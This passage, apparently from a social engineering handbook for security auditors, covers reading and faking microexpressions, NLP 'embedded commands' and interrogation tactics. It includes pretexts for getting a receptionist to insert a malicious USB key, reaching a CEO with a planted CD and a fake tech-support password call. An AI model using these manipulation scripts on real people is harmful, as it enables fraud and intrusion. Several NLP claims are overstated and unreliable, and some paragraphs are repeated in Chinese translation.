You might not have been able to identify the aspects of a true smile in your head but something told you the person wasn’t being “real.” In the late 1800s a French neurologist, Duchenne de Boulogne, did some fascinating research into smiling. He was able to attach electrodes to a man’s face and trigger the same “muscular” response in the face as a smile. Even though the man was using all the right muscles for smiling, de Boulogne determined that the look of the man was still a “fake smile.” Why?

When a person smiles for real, de Boulogne indicates, two muscles are triggered, the zygomaticus major muscle and the orbicularis oculi. Duchenne determined that the orbicularis oculi (muscle around the eyes) cannot be triggered voluntarily and that is what separates a real from a fake smile.

Dr. Ekman’s research concurs with Duchenne’s and although recent research indicates some can train themselves to think about triggering that muscle, more often than not a fake smile is all about the eyes. A real smile is broad with narrow eyes, raised cheeks, and pulled-up lower eyelids. It has been said that a real smile involves the whole face, from the eyes to the mouth, as seen in Figure 5-13.

Figure 5-13: Dr. Ekman demonstrates a fake smile (left) next to a real smile (right).

If you were to cover the top half of Dr. Ekman’s face you would be hard pressed to tell a real from a fake smile. It is not until you examine the eyes that it becomes clear, side by side, which smile is fake and which is real.

When a person sees a real smile on another person's face, it can trigger that same emotion inside of them and cause them to smile. Notice Figure 5-14, this man is showing genuine happiness with a real smile. Notice how his whole face is involved in this smile.

From a social engineering standpoint, knowing how to detect and also create a real smile is a valuable piece of information. A social engineer wants a target to be put at ease, so as to have the greatest positive effect on the target. Social engineers in any form, whether they are salespeople, teachers, psychologists, or any other social engineer, often start off a conversation with a smile. Quickly our brains analyze how we feel about that visual input given to us and it can affect the rest of the interaction.

A lot of information is packed into the preceding section, yet you may be wondering how social engineers can train themselves not only to see microexpressions but also how to use them.

Figure 5-14: Notice how his whole face is involved in this smile.

© Shaileshnanal (Shailesh Nanal) | Dreamstime.com

Training Yourself to See Microexpressions

Hollywood often overstates the abilities of the characters that appear in movies and television. For example, in the new hit television show Lie To Me (based on Dr. Ekman’s research) the main character, Dr. Lightman, can read microexpressions with seemingly no effort, and what is even more amazing is he usually can tell why the emotion is occurring.

Yet in real life, much of the research done by those in the field, like Dr. Ekman, meant sitting in front of prerecorded sessions and analyzing these sessions frame by frame. After many years of working on this task he is probably able to notice, pick up, and analyze microexpressions very quickly. In the 1970s he did a research project where he identified some who had a natural ability to notice and correctly analyze microexpressions.

 

因为我们中的许多人可能不属于这种天生的能力,所以我们需要一种练习、训练和熟练掌握微表情的方法。我可以告诉你什么对我有用。我阅读了关于如何识别特定微表情的方法,然后练习用镜子重现它,将我的表情与专业人士描述如何做到这一点的笔记进行比较。我通常会有一张显示我正在处理的情绪的图片,因为有东西可以模仿对我有帮助。

Because many of us might not fall into that natural ability category we need a way to practice, train, and become proficient at performing, reading, and using microexpressions. I can tell you what works for me. I read the methods on how a particular microexpression is identified, then practice reproducing it using a mirror, comparing my expression to the notes from the professionals that describe how it is done. I usually have a picture that shows the emotion I am working on because having something to mimic helps me.

 

在我对重现微表情感觉相对良好之后,我会关注它给我带来的感受,调整小区域直到肌肉运动使我感受到匹配的情绪。

After I feel relatively good about reproducing the microexpression I focus on how it makes me feel, tweaking small areas until the muscular movements cause me to feel the matching emotions.

 

I then scour the Internet looking for pictures and try to identify the expressions in those pictures. Next, I record news or television shows and play certain parts in slow motion with the sound off to see if I can determine the emotion, then listen to the story to see if I was close. All this leads up to working with live “subjects.” I watch people interact with each other and try to identify the emotions they are feeling during their discussions. I try both with being able to hear the conversation and also without being able to.

The reason I chose this path before trying to read microexpressions in my own conversations is that I found that trying to do it in a live environment without having to also focus on making good conversation is easier. I just read the facial expressions and do not get confused by other sensory input. The preceding method is the one I used before I had a chance to meet Dr. Ekman and be introduced to his training methods. Of course, he has books that contain step-by-step instructions on recreating and reading these expressions. His books also include pictures showing the emotions as well as examples in the news that show those emotions. His book Emotions Revealed does this in a very professional format that is excellent for learning.

In recent years Dr. Ekman has developed and released training specifically for microexpressions. His website, www.paulekman.com, has three different types of training that have changed the way people can learn this powerful science.

Ekman’s training gives the user a lesson on each type of microexpression via video and text. The user can replay the expression video to see how each part of the face is involved. After the user spends as much time as needed learning and watching the video sections, she can take a pretest. The pretest enables her to see how good she is at noticing microexpressions. When the user guesses at what microexpression is being displayed, she can get confirmation or correction. If correction is needed then she can take additional education and training.

After the user is confident in her abilities she can take the real test. In the final exam no correction is given. The user is shown a microexpression once for a brief one twenty-fifth of a second, and then she must select what the microexpression is and then wait to be graded at the end.

This type of training tool can take years off of your learning curve in becoming proficient at reading microexpressions. One caveat: Dr. Ekman, as well as his contemporaries, state that even though you may become proficient in reading microexpressions, a microexpression is limited. What does that mean?

One of the tricks actors use to be able to successfully show proper emotion is to remember and focus on a time when they truly felt the emotion they need to portray; for example, a moment of happiness that produced a real smile. As mentioned earlier, making a real smile is very difficult to fake if you aren’t truly feeling happy, but if you can bring up a memory when you felt that emotion your muscles will remember and react.

Therefore, although you can become proficient at reading the emotion, you cannot read the why behind it. The why is often lost to science. I had a friend who had some bad experiences as a child with a person who closely resembled a good friend of mine. Whenever my friend would come around she had strong emotional reactions. If you were to read her microexpression you would probably see fear, contempt, and then anger on her face. She did not hate my friend, but she hated the person in her memory who resembled my friend.

This is a good point to remember when you are learning how to read microexpressions. The expression is linked to an emotion, but the expression doesn’t tell you why the emotion is being displayed. I know when I first started learning about microexpressions and then became somewhat “proficient” at reading certain expressions, I felt like I was a mind reader. Although this is far from the truth, the caution is to not be assumptive. You may become very good at reading microexpressions; however, later sections discuss how to combine this skill with interrogation tactics, body language skills, and elicitation skills to not only figure out what targets are thinking, but also to lead them down the path you want.

The question you still may have is, “How can I use these skills as a social engineer?”

How Social Engineers Use Microexpressions

This whole section leads up to this: As fascinating as the research is, as amazing as the science is behind this psychology, how do you utilize microexpressions in a social engineer audit and how do malicious social engineers use them?

This section discusses two methods of how to use microexpressions in social engineering. The first method is using microexpressions (ME) to elicit or cause an emotion, and the second method is how to detect deceit.

Let me start with the first method, using your own ME to cause an emotional response in others. I recently read a research paper that changed my view of ME and opened my eyes to a new area of research. Researchers Wen Li, Richard E. Zinbarg, Stephan G. Boehm, and Ken A. Paller performed a study called “Neural and Behavioral Evidence for Affective Priming from Unconsciously Perceived Emotional Facial Expressions and the Influence of Trait Anxiety” that changes the face of microexpression usage in modern science.

The researchers connected dozens of mini-EKGs to muscle points on their subjects’ faces. The devices would register any muscular movements in their face and head. They then played videos for them that had one-twenty-fifth-second flashes of microexpressions in frames. Li et al. found that in almost every case the subject’s muscular movement would begin to mirror that which was embedded in the video. If it was fear or sadness, the subject’s facial muscles would register those emotions. When interviewed about the emotion the subject was feeling, it was the emotion embedded in the video.

To me, this groundbreaking research proves that a person can manipulate another person to a certain emotional state by displaying subtle hints of that emotion. I have started conducting some research into this from a security angle and I am calling it “neurolinguistic hacking,” mainly because it takes much from microexpressions as well as neurolinguistic programming (discussed in the next section) and combines them to create these emotional states within a target.

Imagine this scenario. A social engineer wants to walk into a company with the goal of getting the receptionist to insert a malicious USB key into the computer. His pretext is that he has a meeting with the HR manager, but on the way in, he spilled coffee all over his last resume. He really needs this job and to help, would she print him out another copy of the resume?

This is a solid pretext that tugs on the receptionist’s heartstrings and has worked for me in the past. Yet, if the social engineer allows his own emotional state to run rampant he might be showing signs of fear, which is linked to nervousness. That fear can translate to an uneasy feeling in the receptionist and failure or rejection of the request. Whereas if he were to control his emotions and flash subtle hints of sad microexpressions, which are closely linked with empathy, then he might have a very good chance at his request being honored.

Recall the previous discussion of the commercials that encourage people to donate “only a dollar a day” to feed a child in need. Before requesting money, before flashing a phone number and URL, before telling you that credit cards are accepted, many long images of very sad children flash across your TV screen. Those images of children in need and children in pain put your brain in the emotional state that is needed to comply with the request.

Do those commercials work on everyone? No, of course not. But although not everyone donates, it will affect almost everyone’s emotional state. That is how a social engineer can use ME to the fullest. Learning to exhibit the subtle hints of these ME can cause the neurons in your target’s brain to mirror the emotional state they feel you are displaying, making your target more willing to comply with your request.

This usage of ME can be malicious, so I want to take a moment to talk about a mitigation (see also Chapter 9). Being aware of how ME can be used doesn’t mean you need to start training everyone in your company to be an ME expert. What it does mean is that good security awareness training does need to occur. Even when requests are designed to make you desire to help, desire to save, desire to nurture, the security policy must take precedence. A simple, “I’m sorry we cannot insert foreign USB keys into our computers. But two miles down the road is a FedEx Kinko’s shop. You can print another resume there. Should I tell Mrs. Smith you will be a few minutes late?”

In this scenario, such a statement would have squashed the social engineer’s plans as well as given the target the feeling of being helpful.

To utilize the power of ME, sometimes you have to combine it with other aspects of human behavior as well. The second method, how to detect deceit, describes how you can do this. The second method for using ME as a social engineer is in detecting deception. Wouldn’t it be nice if you could ask a question and know whether the response was truth or not? This subject has been a source of heated debate among many professionals who claim that eye patterns, body language, facial expression, or a combination of all the preceding can indicate truth or deception. While some do not believe this to be the case, others feel these can be used as an exact science.

Although some truth may exist in each of those thoughts, how can you use microexpressions to detect deception?

To answer this question you must take into account more than just microexpressions because, as identified throughout this section, microexpressions are based on emotions and reactions to emotions. Keep this in mind while reading this section, which analyzes some causes and effects.

Four things can help you detect deceit in a target:

  • Contradictions
  • Hesitation
  • Changes in behavior
  • Hand gestures

The following sections discuss these items in more detail.

Contradictions

Contradictions are particularly tricky because they often can and do occur in factual accounts. I know in my case I often forget details, and my wife will fill them in quickly. After I get a little hint here or there I often can remember the full story. This doesn’t mean that I am always lying at the beginning of a story or conversation, but I don’t always remember all the details clearly enough to comment on them at first, or I think I do remember the details but I really don’t. Even after I “remember” the details, the details may be my version of reality and not the way the story actually happened.

This inadvertent dishonesty is important to consider when evaluating contradictions as a clue to lying. What a contradiction should do is prompt you to dig more. Watching the person’s microexpressions while you question him about a contradiction is also helpful.

For example, suppose you have developed a pretext as a visiting salesperson. You are going to try to gain physical access to the CEO to deliver a CD with a special offer. You know the CEO is very partial to a certain charity so you developed the pretext around that. As you walk into the lobby the front desk person says, “Sorry, he is not in, you can just leave it with me.”

You know that if you leave the CD a greater chance exists that your “malicious” CD will never be used. You also feel he is in because you see his car in the parking lot and you know today was a normal work day for him. With those facts in mind and without wanting to embarrass the front desk person you say, “Oh, he’s really not? I called the other day and asked when I could visit and was told today was a good day. Did I mix up my days?”

If you’ve played your cards right and your expressions are genuine, this can turn out two ways:

  • She may hold steady and again say, “Sorry, he’s not in.”
  • She may contradict herself (which can be a clue that she is not being truthful): “Let me check whether he is in or not.”

What? She went from a stern “He is not in” to “Let me check.” That contradiction is enough to signal that you should dig more. What was her ME when she did that? Did she show shame or maybe some sadness at lying? Was she angry at being caught in a lie? Was she embarrassed that she was wrong and maybe confused? You cannot automatically assume she is lying, because maybe she really didn’t know, and when you rebutted she decided to really find out.

After she confirms whether he is in you can choose to dig a little deeper and probe more to determine truthfulness if needed. Again, playing your card of “Maybe I mixed up my days” and watching her facial expressions can be a good indicator of her truthfulness or not.

If in your first go-round you saw any hints of anger, continuing to enquire can cause her to be more angry and embarrassed and end your interaction. At this point, you may want to ask something like, “If Mr. Smith isn’t in right now and I really mixed up my days or times, when can I stop in to see him? What time is the best?”

This type of question allows her to save face, as well as gives you another opportunity to read some facial expressions. If you didn’t notice anger but maybe saw she looked a little sad or embarrassed then you might want to respond with empathy and understanding to open her up. “I could have sworn that he said today was a good time to drop it off, but you know, my memory is so bad, my wife tells me I am getting Alzheimer’s. I bought one of these smart phones, but I’ll be darned if I can figure it out. I don’t want to be a bother, but when can I just drop this off for him? I want to make sure it gets right into his hands.”

Be very observant of minor contradictions as they can be key indicators in deceit and help you get your foot in the door.

Hesitation

Similarly to contradiction, you can use someone’s hesitation to detect a potential untruth. If you ask a question and the answer should have come quickly from the person, but he hesitates beforehand, it can be an indication that he was using the time to fabricate an answer.

For example, when my wife asks me how much my new electronic gadget costs, she knows I know the answer. A hesitation can mean either I am evaluating whether I want to answer truthfully or I might just be remembering the price.

When I get a progress report from my son’s school that says he missed X number of days at school and I only know about two or three valid absences, I ask him where the rest of these missed days are from. If his answer is, “Dad, don’t you remember I had that doctor appointment and then you kept me home that day to help you with that project?” then most likely that is full-on truth, because it came quickly and had facts in the response. However, if he hesitates and comes back with, “Wow, I don’t know—maybe the report is wrong,” then noting his microexpression during his response is a good idea. Does it indicate anger, maybe at being caught, or sadness at the imagined punishment? Either way, it is time for me to investigate more and find out where he was those days.

Another thing to look out for is a well-known hesitation tactic of repeating the question back to you as if asking for verification that the question is correct. Doing so allows for time to fabricate a response. The use of hesitation to detect deception is not an exact science, but it can be a good indicator. Some people just think before they speak. I am from New York, so I speak fast. If someone speaks slower than me it is not an indication of deceit. You must be able to use the ME to determine if someone is just slow at speaking or trying to fabricate a response.

If the emotion does not match the question asked then it might be worth looking into.

Changes in Behavior

During a discussion the target may change his behavior every time a certain topic is brought up. Maybe you notice an expression change or a shift in the way he sits, or a marked hesitation. All of these actions can indicate deceit. Whether these actions amount to deceit is not certain, but they should cause you to probe more on the topics being discussed in a way that does not alert suspicion. These behaviors can be signs that the person is using the time delays to generate a story, recall facts, or decide whether he wants to reveal those facts.

Hand Gestures

People often paint pictures with their hands using gestures. For example, someone may use his hands to show how big something is, how fast something was going, or to show how many times something was said. Many professionals feel that when someone is being untruthful he will touch or rub his face often. Some psychological connection exists between rubbing the face and generating a fabrication. Some of the cues used by psychologists and body language experts to detect deceit are discussed here: www.examiner.com/mental-health-in-new-orleans/detecting-deception-using-body-language-and-verbal-cues-to-detect-lies.

Taking note of a change in the size, frequency, or duration of hand gestures during a conversation is important. In addition, you should watch facial expressions during gestures that can raise a flag in your mind.

When you detect deceit, having a plan for how to respond is important and a good idea. In the earlier scenario with the front desk person and her “out-of-the-office” boss, calling her out on her lie would most likely have raised all sorts of red flags, embarrassing her, and ruining any chances of success. If your pretext is someone with authority, like a manager or department supervisor, and you catch someone in a lie you can then use that to your advantage. By “forgiving” the person you are now owed a favor in return. But in the same scenario, if the position you are in is lower (someone in a non-management position such as a secretary, receptionist, or sales position) than the target, playing that card can be dangerous. The authority action would not fit the pretext of someone in a non-management position.

What it boils down to simply is that as a social engineer auditor you must learn to use a person’s microexpressions to determine whether he is presenting the truth or a lie and to determine whether you are affecting the target the way you want. In some cases you can even use certain expressions to manipulate the target into a certain state of mind.

Remember, microexpressions alone are not enough to determine why an emotion is occurring. Determining that someone is angry or sad, for instance, doesn’t tell you why that person is angry or sad. Be cautious when using microexpressions to take into consideration all factors to determine, as closely as possible, the reason for the emotion.

Malicious social engineers employ these tactics of using microexpressions discussed in this section but their goals are completely different from those of a social engineer doing an audit. They often don’t care about the residual effect on the target. If damaging a person’s belief system, psychological stability, or even job stability can lead the malicious social engineer to a payday he will take that path.

Earlier in this book you read about some scams that came up during the attacks in New York City after 9/11. People who saw an opportunity to cash in on people’s sympathy and the tragedy that occurred didn’t seem to care whether their actions hurt others. Many came out of the shadows claiming to have family who were lost in those attacks. Some of these malicious people received money, gifts, sympathy, and even media attention only for it to be discovered down the road that the stories were all false accounts.

The malicious social engineer spends a lot of time learning about people and what makes them tick. This knowledge makes locating an acceptable target to attack easier.

This section just scratched the surface of microexpressions; the work of many professionals in the field has filled volumes. Seek out training, become proficient in reading and using microexpressions, and you will see an increase in your communication abilities with others. In addition, this proficiency will enhance your ability to have success in your audits.

Neurolinguistic Programming (NLP)

Neurolinguistic programming (NLP) studies the structure of how humans think and experience the world. It is very controversial in itself because the structure of NLP does not lend itself to precise, statistical formulas. Many scientists will argue or debate the principles of NLP due to this fact, but the structure does lead to models of how the principles work. From these models, techniques for quickly and effectively changing thoughts, behaviors, and beliefs that limit people have been developed.

As stated in Wikipedia (source: Oxford English Dictionary), neurolinguistic programming is “a model of interpersonal communication chiefly concerned with the relationship between successful patterns of behavior and the subjective experiences (esp. patterns of thought) underlying them,” and “a system of alternative therapy based on this which seeks to educate people in self-awareness and effective communication, and to change their patterns of mental and emotional behavior.”

This book is far from a self-help book, so although the principles in it can assist in changing deep-seated thought patterns and habits in yourself, its focus is on how you can use NLP to understand and then manipulate those around you.

If you are unfamiliar with NLP your first instinct may be to run to a computer and type the term into Google. I want to ask you not to do that just yet. You will find that similar to social engineering, what you will often find first are many videos and demonstrations that just seem very unrealistic, such as videos of someone touching another person’s shoulder and changing that person’s brain patterns to think brown is white or some such. These videos make out NLP to be some form of mysticism, and for those who are leery of these things, these types of videos discredit it.

Instead the following sections break NLP down into a few parts. Up next is a very brief history of NLP, which can help you to understand that its roots are not with street magicians; instead, it has deep psychological roots.

The History of Neurolinguistic Programming

Neurolinguistic programming (NLP) was developed in the 1970s by Richard Bandler and John Grinder with the guidance of Gregory Bateson. Its roots came from Bandler and Grinder’s research into some of the most successful therapists of their time.

From this initial research they developed the “code” concepts of NLP. This early research led to the development of a meta-model, which recognizes the use of language patterns to influence change.

Both Bandler and Grinder were students at the University of California and used the principles of their research to develop a therapy model called the meta-model. After writing a few books based on this model they began to refine the core principles that would become what we call NLP today. This included things like anchoring, swish pattern, reframing, belief change, nesting loops, chaining states, and submodalities applications.

After graduating with degrees in psychology, Bandler and Grinder began hosting seminars and practice groups, which served as places for them to practice and test their newly discovered patterns while allowing them to transfer the skills to the participants. During this period, a creative group of students and psychotherapists who formed around Grinder and Bandler made valuable contributions to NLP, helping refine NLP even more.

In recent years, NLP has again become a buzzword among managers, driving rapid growth in trainers, classes, and experts. Without any regulating body, the field grew as everybody wanted to learn to control others, lie without getting caught, or solve all their psychological problems. Practitioners were not licensed, so each group taught its own form and concept of NLP and issued its own certifications as experts. All of this is what led to NLP being viewed somewhat unfavorably.

 

Despite its rocky history, the core foundation of NLP can enhance your abilities as a social engineer. The next section discusses some of the core codes of NLP so you can analyze them more deeply.

 

Codes of Neurolinguistic Programming

 

In the early 1970s NLP had a code made up of the collective body of learning and investigation that generated the first books and the term neurolinguistic programming. As time went on, John Grinder and others continued to contribute to the field of NLP. The “new code of NLP” is an ethical and aesthetic framework for NLP development.

 

New Code of NLP

 

NLP’s original ideas were born in the 1970s. As time passed, John Grinder began to realize that much of the old code must change to be brought into modern times. He began working with Gregory Bateson and Judith DeLozier and produced the “new code” that focused more on what the person thinks or believes will happen and changing that belief. Learning techniques for expanding your perceptions, overcoming old thought patterns, and changing habits all help in self-change.

 

The new code focuses on the key concepts of states, conscious/unconscious relationships, and perceptual filters, all of these pointing to states of your mind and your perception of those mental states. These new concepts are meant to move NLP forward and help practitioners think about it in new ways. Many of the basic tenets from the new code are being taught now as part of the standard NLP courseware. This new code is best understood by reading Turtles All the Way Down by Grinder and DeLozier. It’s compiled from their seminar “Prerequisites to Personal Genius.”

 

In essence, the new code states that to make a change the client must involve their unconscious mind, the new behavior must satisfy their original positive intention, and the change must occur internally at the state of mind rather than at the behavioral level. This new code suggests how NLP can create serious and drastic changes to a person’s thinking.

 

This is a key concept for social engineers because, as you investigate and analyze the new code, you will begin to see how it can be used to manipulate others. Before doing that, though, you need to understand the scripts that the new code uses.

 

Scripts in the New Code

 

People tend to have common problems, so groups of scripts have been developed to help therapists use NLP in their practice. These scripts lead the participant through a series of thoughts that help guide the person to the desired end. Several good books on NLP scripts exist, with The Big Book of NLP Techniques: 200+ Patterns & Strategies of Neuro Linguistic Programming being highly recommended.

 

An example of one script is an outline of how to increase your sales by getting someone to start talking about their dreams. Once you have them talking about certain goals or aspirations, you can posit your product or service as answering one of the needs to reach those goals. By positively building on your product as fitting a need they have, you give your prospect’s brain a way to connect your product with those positive goals.

 

If you take time to Google much of the information included here, you will see that NLP can take on a life of its own. You can take many angles and paths when studying NLP. Despite the plethora of information out there, the question remains: how can a social engineer use NLP?

 

How to Use NLP as a Social Engineer

 

Many of the scripts and principles of NLP tend to lean toward hypnosis and similar avenues. Even though you will not use hypnosis to social engineer a target, you can use many of the principles of NLP as a social engineer. For example, NLP can teach you how to use your voice, language, and choice of words to guide people down the path you want.

 

Voice in NLP

 

You can use your voice to inject commands into people just as you would use code to inject commands into a SQL database. The way you say things is where the injection occurs; this single moment of injection is framed within regular conversation. Sometimes how you say something is more important than what you say.

 

NLP promotes the use of embedded commands to influence a target to think a certain way or take a certain action. Also, using the tones of your voice to emphasize certain words in a sentence can cause a person’s unconscious mind to focus on those words. For example:

 

Ask, “Don’t you agree?” but instead of putting an upswing on the word “agree,” as you normally would at the end of a question, put a downswing on it to make the question more of a command.

 

Another one I have heard used effectively is, “My customers usually do the things I say. Do you want to begin?” The way that sentence is used and surrounded by other statements can make this a very commanding statement.

 

More on this in the next section, but this skill alone can change the way you interact with others; the principles for it are steeped in NLP.

 

Sentence Structure

 

In English, the sound of a person’s voice at the end of a sentence indicates whether what is being said is a question, a statement, or a command. A person’s voice goes up at the end of a sentence for questions. The voice stays level through the end of the sentence in statements, and the voice lowers at the close of the sentence for commands.

 

For the next few paragraphs, the bold font denotes to lower (deepen) your voice tone.

 
 

Try this exercise: When you ask a question such as, “Is that your dog?” your voice will rise at the end of that sentence. Yet you can embed subtle commands into sentences by just changing them to a downward point during the sentence, not at the end. Here are a few simple commands for you to practice. Notice how they have the command injected inside the sentence.

 

“Remember how clean your room looked last Christmas?” The embedded command is “clean your room,” which includes a time shift to a happier time. This is an example of a pleasant, painless injection.

 

“Buy now, you can see the benefits!” This one starts with the voice low, then goes up to a normal tone, then back down for “benefits.”

 

“The higher my company goes in consulting, the more nice people like you we encounter.” Implanting the higher my company with a pleasant comment has just increased your chance of being hired, partly because of the play on words (Higher sounds like hire—thus what the listener hears is hire my company).

 
 

From a social engineering standpoint you can form sentences when performing an audit over the phone to maximize the potential for success, such as:

 

“This is Larry from tech support; we are giving all reps new passwords. Your new password is…”

 

The following are tips for using your voice in successful social engineering:

 
 
     
  • Practice. You have to practice speaking in this manner so you don’t sound like a teenage boy entering puberty. Your rising and falling tones can’t sound canned; they must be subtle.
  • Have careful sentence structure. Develop sentences that maximize your ability to accomplish your tasks. Don’t go for the kill, so to speak. A command like “give me access to your server room now” is probably not going to work, but you can use these voice techniques to help a target be more open to the idea.
  • Be realistic. Don’t expect to speak and have people falling at your feet to do what you ask. These techniques can put your target in a frame of mind that will make getting what you want easier.

One technique, Ultimate Voice, if mastered, does have very powerful effects. I once interviewed an NLP practitioner on a podcast who had this gift. When he spoke it was as if you could not argue with him. He spoke with such control and technique that disagreement never even entered my mind. How can one master this technique?

 

Using Ultimate Voice in Social Engineering

 

You can master the Ultimate Voice, but it takes lots of practice. The ability to embed commands into normal conversation is a skill that is very useful when mastered. Ultimate Voice is the ability to inject commands into people’s minds without their knowledge. It can sound very artificial when newcomers try it, until enough practice makes them sound natural.

 

Hypnotists often use this technique like so:

 

“You can feel yourself relaxing as you slip into calmness.”

 
 

This standard therapy phrase can be adapted to nearly any command you like. Put extra emphasis on the vowels in the words you want to accent—for example, “yooouurseeelf reelaaxiing.”

 

Planet NLP (www.planetnlp.com/) offers three exercises that you can use to work on mastering this technique.

 

1. Move your voice around. Press your hand on your nose and say “nose.” Concentrate on your nose as you repeat the word until you can feel your nose vibrating. Now do the same exercise with your hand on your throat, saying “throat.” Do the same on your chest, saying “chest.” Keep practicing until you can really feel the vibration in each place. Notice how different each one sounds.

2. Use your range. Starting from a high note, say “ar” (as in the letter r). Keeping your mouth open, allow the note to drop down until your breath runs out. Repeat this exercise ten times.

Then, starting from a low note, say “ou” (as in you without the y), allowing the note to rise until you cannot support the sound. Repeat this exercise ten times.

3. Resonate. To use your voice correctly, it must resonate in the mask, which is the facial area surrounding the nose and mouth.

 

There are two ways to practice resonating:

  • Hum at whatever pitch is most comfortable for you. After you have found your pitch, hum “umm” followed immediately by the word “ready.” Do this a few times, then try the words “now,” “one,” “two,” and “three.”
  • Hum and then allow your lips to vibrate. You are attempting to sound like a dove. Allow the pitch to rise and fall. This is very difficult if you have any tension in the jaw or face. Done correctly for a few minutes, your face will start to feel numb.

After a couple of minutes using these methods, you should notice that your voice sounds crisper. If you find it hard to notice, record yourself and listen back to see how it sounds to you.

 

The best way to improve is to spend about five minutes a day going through these exercises.

 

Practice can help you to learn to control this vocal technique. For example, I am generally a loud person. It seems like I don’t have the ability to whisper. For me to control my tones, pitch, and volume, I need practice. Doing simple voice exercises like these can help you to control these voice characteristics.

 

When you speak a sentence in which you want to include a hidden command, and you lower your tone to deliver it, it is imperative to be so subtle that the target doesn’t realize it. Otherwise, you will alert that person’s subconscious that something is amiss. If that occurs, he may pick up on your attempts, thereby shutting down your success.

 

Like most things in social engineering, if a technique doesn’t come naturally, practice is essential. Try this voice technique on your family and friends before you ever attempt it in an audit.

 

From personal experience, when I first started working on the Ultimate Voice techniques I decided my goal was to embed commands into questions. This goal took a while to realize but I would try simplistic things like:

 

“Honey, what do you want to eat for dinner tonight, steak or something else?”

 

To conclude this section, consider three things a social engineer should focus on when studying NLP:

 
 
     
  • Vocal tones. As stated previously, the tones of your voice as well as the emphasis you put on certain words can change the whole meaning of a sentence. Using tone and emphasis, you can embed commands inside of the subconscious mind of the target and allow the target to be more open to suggestion.
  • Choose your words carefully. Learn to choose the words that have maximum impact. Match positive words with thoughts you want the target to think positively on and negative words with those you want them to not think of too highly. This technique can also help the social engineer make a target more pliable.
  • Create a list of command sentences that you can use in person or during a phone social engineering audit. Writing out and practicing command sentences will help you be able to recall and use them when in need.

Most of all, practice. Controlling your vocal tones, the words you choose, and how you say them is not an easy task. Practice can make this become second nature.

 

NLP is a powerful topic, and, much like microexpressions, this section only scratched the surface. Once you start to master the techniques in NLP and the ability to read facial expressions, a next logical step is using these tools when interacting with a target. Next, this chapter analyzes the same tactics professional interrogators use.

 

Interview and Interrogation

 

Scenario 1: The door flies open and the perpetrator is noticeably nervous. Captain Bad-Mood comes over and grabs the perp by the collar and slams him up against the wall. Getting about an inch from his face he screams, “You’ll tell me what I want to know, one way or another!”

 

Scenario 2: The bad guy is tied to a chair, already bruised from the previous 30 minutes of beatings, and as the interrogator grabs a pair of shiny pliers he says, “You’ll be talking in no time….”

 

Scenario 3: The perp is sitting in a chair and two police officers enter the room. Calmly they walk over to the table and set a file labeled “Evidence” down on the table. Before they sit down they ask, “Do you need a coffee or a soda or something?”

 

Cracking open an ice-cold soda the first officer says, “Thanks for coming in today to help us out….”

 

Which one of the preceding scenarios is a real-life interrogation? If you guessed the third one, you’re right. It is how a real interrogation often goes. The first two have been portrayed in Hollywood movies and television series so much that many of us might think they are real. Outside of wartime scenarios and nations that do not ban the use of torture, the third scenario is most likely the way most interrogations begin.

 

Rarely will you as a social engineer be in a situation where your target is waiting in a room for you to question him. With that in mind, you might ask, how can you use the tactics of professional interrogators and interviewers as a social engineer?

 

Before going further you should know the differences between an interrogation and an interview. The following table presents some of these differences, but this topic has many different angles, viewpoints, and opinions, so more could exist.

 
Interview | Interrogation
The subject talks; you listen. | You discuss his statements with the subject.
The subject leads the direction; you clarify his statements and listen, then apply NLP skills. | You lead the direction. Apply NLP skills here.
Nonaccusatory. | Accusatory.
Soft demeanor. | Hard demeanor.
Subject’s location; the subject is at ease. | Interrogation room; the subject is tense.
You gather information (who, what, when, where, why, and how). | You learn the details if you reveal certain information.
Early in the investigation. | Final stage of the interrogation.

The main difference between an interview and interrogation is that an interview is in an atmosphere where the target is comfortable both physically and psychologically, whereas in an interrogation the goal is to put some pressure on the target by creating discomfort with the location or the questions asked, with the goal of gaining a confession or some knowledge the target possesses.

 

Good interrogation is an art that you can master through experience. Many social engineering skills tie into being a good interrogator. Skills like elicitation (see Chapter 3); reading people, faces, and gestures; and having insight into human behavior can all help you become a legendary interrogator.

 

Interviewing is a great skill to have, but as long as you can master the use of elicitation you can become great at conducting interviews.

 

Interrogation principles are used widely by successful social engineers. Putting a target in some psychological or physical discomfort to make gathering information from them easier is a skill most social engineers will spend considerable time acquiring.

 

Professional Interrogation Tactics

 

Before conducting any interview or interrogation, the social engineer will need to have done thorough information gathering. You must obtain as much information about the target, the company, the situation, and details of each as possible. You must know how to approach a target and what to say, and have in mind the path you will take with the target. Be careful to observe your surroundings as well as any changes in the target during the conversation and initial approach.

 

One of the mistakes people new to interviewing and interrogation make is assuming every behavioral change has major meaning. A target’s crossing her arms doesn’t just mean a closed thought; she could also be cold, have underarm stink, or feel increased stress because of your questions.

 

Don’t watch for only one sign; watch for groups of signs. For example, a target crosses her arms, turns her head, and places her feet flat on the floor. This is a closed person; in other words, her body language indicates that she will divulge no more information or cooperate any longer—this door has been shut. A group of changes is the most important thing to watch for, so note the topic that was being discussed when the group of changes occurred.

 

When starting an interview or interrogation here are areas to observe for changes in the subject:

 
 
     
  • Body posture: Upright, slumped, leaning away
  • Skin color: Pale, red, white, changes
  • Head position: Upright, tilted, forward/back
  • Eyes: Direction, openness
  • Hands/feet: Movement, position, color
  • Mouth/lips: Position, color, turned up/down
  • Primary sense: Visual, aural, kinetic, feeling
  • Voice: Pitch, rate, changes
  • Words: Short, long, number of syllables, dysfunctions, pauses

Changes can indicate a question or line of questioning that needs more attention. For example, if the body posture is very relaxed when you ask, “Is Mr. CEO in? I would like to leave this information packet for his review,” and then the body posture changes to a defensive posture—the torso pointing away and the eyes averting from looking at you—it may be a good indication that there is some untruth coming up and further questioning might reveal the truth on this topic.

 

Especially be sure to pay attention to the words a target uses. During the interview or interrogation process, pay particular attention to the subject’s voice and how she answers questions. When you ask a question, how long does it take for her to answer? Blurting out answers quickly is believed to be a sign of practicing the answer. If she takes too long, maybe she was thinking up the answer. Response time depends on each person, though, because you have to determine what is “natural” for each person.

 

Determining what is natural in a target (that is, the baseline) is not a small matter in a social engineering gig and must be done very fast. Being very observant is the key to success with this skill. One method of creating a baseline involves asking questions that cause the suspect to access different parts of his brain. The interrogator asks nonthreatening questions that require simple memory and questions that require creative thinking. Then look for outward manifestation of his brain activating the memory center, such as microexpressions or body language cues.

 

Another area to listen for is changes in verb tense and pronoun use. These shifts from past tense to future tense show areas you might want to investigate further. Switching tense can indicate deception. When a target switches tense they may be fabricating an answer or thinking of a past statement to fabricate an answer. Further questioning can reveal the truth here also. Other areas of change you should listen to are the pitch of the voice (is it going up with stress?) and the speed of speaking.

 

